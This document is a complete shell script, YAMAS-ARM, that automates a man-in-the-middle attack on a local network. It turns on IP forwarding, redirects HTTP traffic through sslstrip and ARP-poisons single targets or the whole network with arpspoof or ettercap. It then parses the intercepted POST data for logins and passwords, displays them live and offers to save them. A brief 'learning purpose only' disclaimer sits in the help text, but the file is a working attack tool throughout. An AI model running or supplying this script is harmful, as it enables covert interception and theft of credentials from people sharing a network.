#!/bin/sh

# Bash script to launch man it the middle attack and sslstrip.
# Based on yamas v1.0 by comaX for pcsci3ence.info

#Version information
version=1.0

# device variables
pathLog=/home/user/yamas
pathApp=/opt/yamas

# if user ^C then execute cleanup function
trap fast_cleanup SIGINT # will prolly output errors, but that's normal since it may try killing non-existing processes.

#Check if the script is being run as root
if [ "$(id -u)" != "0" ]; then
   echo -e "\033[31mYou are not running this script as root.\nPlease become root (e.g. \"sudo gainroot\") before launching this script\033[m"
   exit
fi

#Check if the required dependencies exist.
dep() {
   echo; echo -en "Checking for the needed dependencies:\n"
   echo -en "\t wget\t\t"
   if dpkg -l | grep wget 1>/dev/null; then 
     echo -e "\t\033[32m[Success]\033[m"
   else 
     echo -e "\t\033[31m[Failed!]\033[m"
     echo 0 >> ./test.txt
   fi
   
   echo -en "\t busybox-power\t"
   if dpkg -l | grep -w busybox-power 1>/dev/null; then 
     echo -e "\t\033[32m[Success]\033[m"
   else 
     echo -e "\t\033[31m[Failed!]\033[m"
     echo 0 >> ./test.txt
   fi
   
   echo -en "\t Dsniff(arpspoof)\t"
   if dpkg -l | grep -w dsniff 1>/dev/null; then 
     echo -e "\033[32m[Success]\033[m"
   else 
     echo -e "\t\033[31m[Failed!]\033[m"
     echo 0 >> ./test.txt
   fi
   
   echo -en "\t xterm\t\t"
   if dpkg -l | grep -w " xterm" 1>/dev/null; then 
     echo -e "\t\033[32m[Success]\033[m"
   else 
     echo -e "\t\033[31m[Failed!]\033[m"
     echo 0 >> ./test.txt
   fi
   
   echo -en "\t iptables\t"
   if dpkg -l | grep iptables 1>/dev/null; then 
     echo -e "\t\033[32m[Success]\033[m"
   else 
     echo -e "\t\033[31m[Failed!]\033[m"
     echo 0 >> ./test.txt
   fi
     
   echo -en "\t nmap\t\t"
   if dpkg -l | grep nmap 1>/dev/null; then 
     echo -e "\t\033[32m[Success]\033[m"
   else 
     echo -e "\t\033[31m[Failed!]\033[m"
     echo 0 >> ./test.txt
   fi

   echo -en "\t grep\t\t"
   if dpkg -l | grep libpcre3 1>/dev/null; then 
     echo -e "\t\033[32m[Success]\033[m"
   else 
     echo -e "\t\033[31m[Failed!]\033[m"
     echo 0 >> ./test.txt
   fi
   
   echo -en "\t pcap\t\t"
   if dpkg -l | grep libpcap0.8 1>/dev/null; then 
     echo -e "\t\033[32m[Success]\033[m"
   else 
     echo -e "\t\033[31m[Failed!]\033[m"
     echo 0 > ./test.txt
   fi
          
   echo -en "\t sslstrip\t"
   if dpkg -l | grep sslstrip 1>/dev/null; then 
     echo -e "\t\033[32m[Success]\033[m"
   else 
     echo -e "\t\033[31m[Failed!]\033[m"
     echo 0 >> ./test.txt
   fi
     
    echo -en "\t python-twisted-web"
   if dpkg -l | grep python-twisted-web 1>/dev/null; then 
     echo -e "\t\033[32m[Success]\033[m"
   else 
     echo -e "\t\033[31m[Failed!]\033[m"
     echo 0 >> ./test.txt
   fi

   echo -en "\t python-openssl"
   if dpkg -l | grep python-openssl 1>/dev/null; then 
     echo -e "\t\033[32m[Success]\033[m"
   else 
     echo -e "\t\033[31m[Failed!]\033[m"
     echo 0 >> ./test.txt
   fi
   
   if [ ! -e "./test.txt" ]; then
      echo "All right ! Let's keep rolling..."
      echo 1 > $pathLog/.ok
   else
      rm ./test.txt
      if [ -e "$pathLog/.ok" ]; then rm $pathLog/.ok; fi
      echo "You are missing dependencies, this script will fail : exiting ! "
      sleep 3

      exit 0
   fi
}

if [ ! -e "$pathLog/.ok" ]; then dep; fi
#Check if yamas folder exists, if not create it
if [ ! -d "$pathLog" ]; then
   mkdir $pathLog
fi
#Let's define some arguments that can be passed to the script :
args=
while [ "$#" -ge 1 ] #check parameters
do
  case $1 in
   -d | --depend) # force check for dependencies
      clear
      dep # calling the function.
      ;;
      
   -e | --ettercap) etter=1 ;;
      
   -v | --version) #Print version and exits
      clear
      echo "YAMAS - Yet Another Man In The Middle Automation Script"
      echo "Version: $version"
      exit 0 ;;

   -p | --parse) #parse a given filename
      if [[ "$2" == "" ]]; then 
         echo -e "No input file given. Quitting. \nusage : $0 -p <file>"
         exit 0
      fi
      clear
      echo -e "Parsing $2 for credentials.\n\n"
      cat $2 |
         awk -F "(" '/POST Data/ {for (i=1;i<=NF;i++) if (match($i,/POST Data/)) n=i; print "Website = \t"$2; getline; print $n"\n"}' |
         awk -F "&" '{for(i=1;i<=NF;i++) print $i }' |
         egrep -i -a -f $pathApp/grepcred.txt |
         awk -F "=" '{if (length($2) < 4) print "";
                      else if ($1 ~/Website/) print $0;
                      else if ($1 ~/[Pp]/) print "Password = \t"$2"\n";
                      else print "Login = \t"$2}' |
         uniq
      exit 0 ;;
      
   -h | --help) #define help message
      clear 
      echo -e "You are running $0, YAMAS-ARM.


usage : $0 <options>
   -d or --depend : Force check of required dependencies.
   -h or --help : Displays this help message, disclaimer and exit.
   -p <file> or --parse <file> : Only parse the given <file>.
             Don't use wildcards. Use > /output_file to print to a file.
   -v or --version : Show version and exit

\033[31m DISCLAIMER :\033[m
This program is intended for learning purpose only. I do not condone hacking 
and wouldn't be held responsible for your actions. Only you would face legal
consequences if you used this script for illegal activities.

\033[31m What I think should be learnt from this script :\033[m
This script should teach you how easy it is to steal sensitive online
credentials and how to protect you from it, provided you understand
what this program does. The best way to understand what it does is
to look at its source. This will also teach you basic shell scripting.

\033[31mFeatures :\033[m
- Compatible with handled devices.
- Output of credentials as they are sniffed in xterm window.
- Log parsing for user-friendly output.
- Network mapping for host discovery.
- Can save \"dumped\" passwords to file.
- Support for multiple targets on the network.
- Can parse a single file. 
- All options know default, pressing only enter should get you through.
- Very neat and kewl ascii =D

\033[31m Credits :\033[m
Thanks to all people on backtrack forums for their help and support,
as well as maemo's for this version. 
Kudos to Unhuman for asking for this port and testing everything I asked him,
Torpedo, both script-wise and for his great demo video,
Saturn for making this script fully ash compliant and quite a load of stuff,
All the other people for their feedback, support, and help !
And google for being my best friend with scripting.

Please criticize this program or submit ideas on the official thread at
http://tinyurl.com/yamas-arm or send me a mail at contact.comax@gmail.com

"
      exit ;;
   
   *) echo "Invalid parameters, continuing with script $0" & sleep 2 ;;
  esac
  shift
done

clear
echo -e "\b
                  #     #    #    #     #    #     #####  
                   #   #    # #   ##   ##   # #   #     # 
                    # #    #   #  # # # #  #   #  #       
                     #    #     # #  #  # #     #  #####  
                     #    ####### #     # #######       # 
                     #    #     # #     # #     # #     # 
                     #    #     # #     # #     #  #####
                        ARM Edition For Pcsi3ence.info
===========================================================================
=\033[31m       Welcome to Yet Another MITM Automation Script.\033[m                    =
=\033[31m       Use this tool responsibly, and enjoy!\033[m                             =
=       Feel free to contribute and distribute this script as you please. =
=       Official thread : http://tinyurl.com/yamas-arm                    =
=       Check out the help (-h) to see edition informations               =
=       You are running \033[32mYAMAS-arm\033[m                                       =

==========================================================================="
if [[ $etter = 1 ]]; then echo "Using Ettercap instead of Arpspoof";fi ### CONTROL THIS BITCH

# Starting fresh : reset IP forward and iptables
echo -e "\033[31m [+] Cleaning iptables \033[m"
echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo "[-] Cleaned."

# Defining exit function and other ending features
fast_cleanup() {
   echo -e "\n\n\033[31m ^C catched. Cleaning up, then exit.\033[m"
   if [[ "${looparseid}" != "" ]]; then kill ${looparseid}; fi
   if [[ "${sslstripid}" != "" ]]; then kill ${sslstripid}; fi
   if [[ "${tailgrepid}" != "" ]]; then kill ${tailgrepid}; fi
   
   if [[ "$etter" = "1" ]];then
      killall ettercap
   else
      killall arpspoof
   fi
   echo "0" > /proc/sys/net/ipv4/ip_forward #stop ipforwarding
   iptables --flush                 # there are probably too many resets here,
   iptables --table nat --flush     # but at least we're sure everything's clean
   iptables --delete-chain
   iptables --table nat --delete-chain
   if [ -e '/tmp/looparse.sh' ]; then
      rm /tmp/looparse.sh
   fi
   #We don't remove grepcred.txt anymore, in case it's needed later on for parsing, without internet connection.
   echo -e "\033[32m[-] Clean up successful !\033[m"
   exit 0
}

cleanup() {
   echo
   echo -e "\033[31m[+] Killing processes and resetting iptable.\033[m"

   kill ${sslstripid}
   kill ${looparseid}
   if [[ "${tailgrepid}" != "" ]]; then 
      kill ${tailgrepid}
   fi
   
   if [[ "$etter" = "1" ]];then
      killall ettercap
   else
      killall arpspoof
   fi
   echo "0" > /proc/sys/net/ipv4/ip_forward #stop ipforwarding
   iptables --flush                 # there are probably too many resets here,
   iptables --table nat --flush     # but at least we're sure everything's clean
   iptables --delete-chain
   iptables --table nat --delete-chain
   rm /tmp/looparse.sh

   echo -e "\033[32m[-] Clean up successful !\033[m"
   echo -e "\nDo you want to keep the whole log file for further use or shall we delete it? (Y=keep)"
   echo "(If you want to keep it, it will be stored in $pathLog/saved/$filename.txt)"
   read keep
   if [[ "$keep" = "Y" || "$keep" = "y" ]] ; then # double brackets because double condition. || signifies "or"
      mkdir $pathLog/saved/   
      cp $pathLog/$filename.txt $pathLog/saved/$filename.txt #moving file
         if [ -f "$pathLog/saved/$filename.txt" ]; then #check if it exists
            echo "Log file copied !" #it does
         else 
            echo "Error while copying log file. Go check /tmp/ for $filename.txt" #it does not
         fi
   else 
      echo "Logs not saved"
   fi
   echo
   echo "Do you want to save passwords to a file? (Y=keep)"
   echo "(If you want to keep it, it will be saved in $pathLog/saved/$filename.pass.txt)"
   read keeppd
   if [[ "$keeppd" = "Y" || "$keeppd" = "y" ]] ; then # double brackets because double condition. || signifies "or"
      mkdir $pathLog/saved/ 
      cat $pathLog/$filename.txt |
         awk -F "(" '/POST Data/ {for (i=1;i<=NF;i++) if (match($i,/POST Data/)) n=i; print "Website = \t"$2; getline; print $n"\n"}' |
         awk -F "&" '{for(i=1;i<=NF;i++) print $i }' |
         egrep -i -a -f $pathApp/grepcred.txt |
         awk -F "=" '{if (length($2) < 4) print "";
            else if ($1 ~/Website/) print $0;
            else if ($1 ~/[Pp]/) print "Password = \t"$2"\n";
            else print "Login = \t"$2}' |
         uniq >> $pathLog/saved/$filename.pass.txt # >> appends to a potential previous file.
      if [ -f "$pathLog/saved/$filename.pass.txt" ]; then #check if it exists
         echo "Passwords saved !" #it does
      else 
         echo "Error while saving passwords" #it does not
      fi
   else 
      echo "Password saving skipped."
   fi
   rm $pathLog/$filename.txt
   echo -e "\nTemporary files deleted."
}

search=$(ip route show | awk '(NR == 1) { print $1}') #store gateway/24 for whole network mapping to variable
#We put it here in the middle, because it could be used two times, but the gateway shouldn't change,
#so there is no need to do it twice.
rescan () {
   echo -e "\033[31m"
   nmap -sn $search | grep report | awk -F for '{ print $2 }' #host discorvey
   echo -en "\033[m"
   final
}

add_target() {
   echo "Enter a new IP adress to attack :"
   read newip
   if [[ "$etter" = "1" ]];then
      xterm -T "Poisoning $newip" -e "sudo ettercap -o -q -i wlan0 -T -M arp  /$newip/ //" 2>/dev/null & sleep 2
   else
      xterm -T "Poisoning $newip" -e "sudo arpspoof -i wlan0 -t $newip $gateway" 2>/dev/null & sleep 2
   fi
   final
}

ascii() {
   clear
   cat $pathApp/ascii
   final
}

rtparse() {
   echo -e "\n\nIn this menu, you can pause, resume, kill, or launch realtime parsing (RTP).
   1. Pause RTP (keep xterm open for you to read, copypasta, etc.)
   2. Resume RTP.
   3. Kill RTP (stop and close xterm)
   4. Re-launch RTP
   5. Previous menu."
   read rtp
   if [ "$rtp" = "1" ] ; then
      echo -e "\033[33mPausing...\033[m"
      kill -19 ${looparseid}
      rtparse
   elif [ "$rtp" = "2" ] ; then
      echo -e "\033[33mResuming...\033[m"
      kill -18 ${looparseid}
      rtparse
   elif [ "$rtp" = "3" ] ; then
      echo -e "\033[31mKilling...\033[m"
      kill ${looparseid}
      rtparse
   elif [ "$rtp" = "4" ] ; then
      echo -e "\033[32mLaunching...\033[m"
      xterm -hold -T Passwords -e "/tmp/looparse.sh" 2> /dev/null & looparseid=$!
      sleep 2
      rtparse
   elif [ "$rtp" = "5" ] ; then
      echo "Previous"
      final
   else echo -e "\033[31mBad choice bro !\033[m\n" #was "motherfucker" during my tests.
      rtparse
   fi
}

final() {
   echo -e "\n\033[32mAttack is running\033[m. You can :
   1. Rescan network.
   2. Add a target (useless if targeting whole network).
   3. Display ASCII correspondence table.
   4. Real-time parsing...
   5. Quit properly.

   Enter the number of the desired option."
   read final
   case $final in 
   1) rescan ;;
   2) add_target ;;
   3) ascii ;;
   4) rtparse ;;
   5) cleanup ;;
   *) echo -e "\033[31mBad choice bro !\033[m\n" ;; #was "motherfucker" during my tests.
   esac 
   }

###############################End of functions#############################

# IP forwarding
echo
echo -e "\033[31m [+] Activating IP forwarding... \033[m"
echo "1" > /proc/sys/net/ipv4/ip_forward
echo "[-] Activated."

#Iptables
echo
echo -e "\033[31m [+] Configuring iptables... \033[m"
echo -en "\033[31m To \033[mwhat port should the traffic be redirected to? (default = 8080)"
echo
read outport
if [[ "$outport" = "" ]] ; then
   outport=8080
   echo -e "Port $outport selected as default.\n"
fi
echo -en "\033[31m From \033[mwhat port should the traffic be redirected to? (default = 80)"
echo
read inport
if [[ "$inport" = "" ]]; then
   inport=80
   echo -e "Port $inport selected as default.\n"
fi
echo -e "\n\033[33m Traffic from port $inport will be redirected to port $outport \033[m"
iptables -t nat -A PREROUTING -p tcp --destination-port $inport -j REDIRECT --to-port $outport
echo "[-] Traffic rerouted"

#Sslstrip
echo
echo -e "\033[31m [+] Activating sslstrip... \033[m"
echo  "Choose filename to output : (default = yamas)"
read filename
if [[ "$filename" = "" ]] ; then
   filename="yamas"
fi
echo -e "\033[33m Sslstrip will be listening on port $outport and outputting log in $pathLog/$filename.txt\033[m"
sslstrip -f -a -k -l $outport -w $pathLog/$filename.txt 2> /dev/null & sslstripid=$!

sleep 5 #let time for sslstrip to launch. Might be a bit too much, but better prevent than heal.
echo
echo -e " [-] Sslstrip is running." # a bit redundant, but who cares?
echo

#ARP poisoning
echo
echo -e "\033[31m [+] Activating ARP poisoning... \033[m"
echo
ip route show | awk '(NR == 2) { print "Gateway :", $3,"    ", "Interface :", $5}' #Output IP route show user-friendly
gateway=$(ip route show | awk '(NR == 2) { print $3}') #store gateway ip
echo
echo "Enter IP gateway adress or press enter to use $gateway."
read gateway
if [[ "$gateway" = "" ]] ; then
   gateway=$(ip route show | awk '(NR == 2) { print $3}') #restore gateway ip since pressing enter set our var to null
   echo -e "$gateway selected as default.\n"
fi
echo
echo "Using wlan0 as interface"
echo -e "\r"
echo -e "We will target the whole network as default. You can \033[4md\033[miscover hosts and enter IP(s) manually by entering \033[4mD\033[m.
Press enter to default."
read choicearp
echo

if [[ "$choicearp" = "D" || "$choicearp" = "d" ]] ; then
   echo
   echo -e "Do you want to map the network to show live hosts? (Y/N)   [This might take up to 30 secs, be patient]"
   read hosts
   echo -e "\033[31m "
      if [[ "$hosts" = "Y" || "$hosts" = "y" ]] ; then
         nmap -sn $search | grep report | awk -F for '{ print $2 }' #host discovery
         echo -e "\033[m " # switch color back to white
      else 
         echo -e "\033[m "
      fi
   echo -e "Please enter targets according to usage : IP1 IP2 IP3 ... IPn
   \033[31m Beware ! This will spawn as many windows as input targets and might slow down performances. If that was the case, then use whole network targeting.\033[m "
   arpspoofi() { # We launch ARPspoof in different xterm windows to keep script running
      while [ "$1" != "" ]; do
         xterm -T "Poisoning $1" -e "arpspoof -i wlan0 -t $1 $gateway" 2>/dev/null & sleep 2
         shift
      done
      echo -e "\033[33m Targeting $parameters on $gateway through wlan0.\033[m"
   }
   
   ettercapi() { # We launch Ettercap in different xterm windows to keep script running
      while [ "$1" != "" ]; do
         xterm -T "Poisoning $1" -e "ettercap -o -q -i wlan0 -T -M arp /$1/ /$gateway/" 2>/dev/null & sleep 2
         shift
      done
      echo -e "\033[33m Targeting $parameters on $gateway through wlan0.\033[m"
   }
   
   echo "Enter IP adresse(s)."
   read parameters
   if [[ "$parameters" == "" ]]; then 
      echo -e "No input given. Nothing to target so quitting.."
      exit 0
   else
      if [[ "$etter" = "1" ]];then
         ettercapi $parameters
      else
         arpspoofi $parameters
      fi
   fi
else 
   if [[ "$etter" = "1" ]];then
      xterm -T ettercap -e "ettercap -o -q -i wlan0 -T -M arp  /$gateway/ //" 2> /dev/null &
   else
      xterm -T Arpspoof -e "arpspoof -i wlan0 $gateway" 2> /dev/null &
   fi

   sleep 2
   echo -e "\033[33m Targeting the whole network on $gateway on wlan0\033[m"
   echo -e "[-] Arp cache poisoning is launched. \033[31m Keep new window(s) running. \033[m"
fi

echo -e "\n\033[32m Attack should be running smooth, enjoy.\033[m"
echo
echo
echo "looparse(){
while :
do
   clear
   echo -e 'Note that %40 %21, etc. are ASCII chars. + means a space...\n'
   cat $pathLog/$filename.txt |
      awk -F \"(\" '/POST Data/ {for (i=1;i<=NF;i++) if (match(\$i,/POST Data/)) n=i; print \"Website = \t\"\$2; getline; print \$n\"\n\"}' |
      awk -F \"&\" '{for(i=1;i<=NF;i++) print \$i }' | #print each field on a new line
      egrep -i -f '$pathApp/grepcred.txt' |
      awk -F \"=\" '{if (length(\$2) < 3) print \"\";
      else if (\$1 ~/[W]/) print \$0;
      else if (\$1 ~/[Pp]/) print \"Password = \t\" \$2\"\n\";
      else print \"Login = \t\t\", \$2}' |
      uniq
      sleep 7
done
  }
looparse" > /tmp/looparse.sh #We create a parsing script on-the-fly, chmod it, run it, kill it and remove it at the end.
chmod +x /tmp/looparse.sh
xterm -hold -T Passwords -e "/tmp/looparse.sh" 2> /dev/null & looparseid=$! #here's the beauty
sleep 2
final #call the "final" function. Yes, it's the final one.
### End of the script fellas.